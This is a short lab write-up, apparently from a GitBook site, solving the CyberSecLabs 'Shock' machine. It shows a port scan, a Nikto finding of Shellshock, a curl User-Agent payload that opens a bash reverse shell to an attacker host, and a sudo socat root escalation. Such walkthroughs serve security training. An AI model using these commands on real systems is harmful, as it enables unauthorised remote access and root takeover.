📔
Hack World
  • Welcome to Hack World
  • Writeup
    • Proving Grounds - Practice
      • AuthBy
      • Jacko
      • UT99
      • Sirol
      • Twiggy
      • Bratarina
      • Internal
      • Algernon
      • Metallus
      • Kevin
      • Helpdesk
      • Slort
      • Shenzi
      • Pelican
      • Walla
      • Zino
      • Nibbles
      • ZenPhoto
      • Wombo
    • CyberSecLabs
      • Lazy
      • Red
      • Shock
      • CMS
      • Debug
      • Leakage
      • Simple
      • Shares
      • Unroot
      • Outdated
      • Fuel
      • Pie
    • Vulnhub
      • Linux
        • BTRSys2.1
        • CyberSploit1
        • SunsetNoontide
    • HackTheBox
      • Cap
Powered by GitBook
On this page
  • nmap
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. Writeup
  2. CyberSecLabs

Shock

PreviousRedNextCMS

Last updated 3 years ago

Was this helpful?

nmap

mkdir nmap
sudo rustscan -a 172.31.1.3 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

A web service is open on port 80

And we can confirm that port 80 is really a web server.

Let's run Nikto, and after some time running, looks like the server is vulnerable to ShellShock vulnerability.

Exploitation

sudo nc -lvnp 80
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.0.41/80 0>&1' http://172.31.1.3/cgi-bin/test.cgi

Craft the shell to your needs and you should receive your shell.

Privilege Escalation

Running sudo -l we can confirm that we can run socat with root privilege without a password.

To gain root privilege, run the following

sudo socat stdin exec:/bin/sh

Since the shellshock vulnerability is pretty popular, we can find how to exploit and get a reverse shell from

hacktricks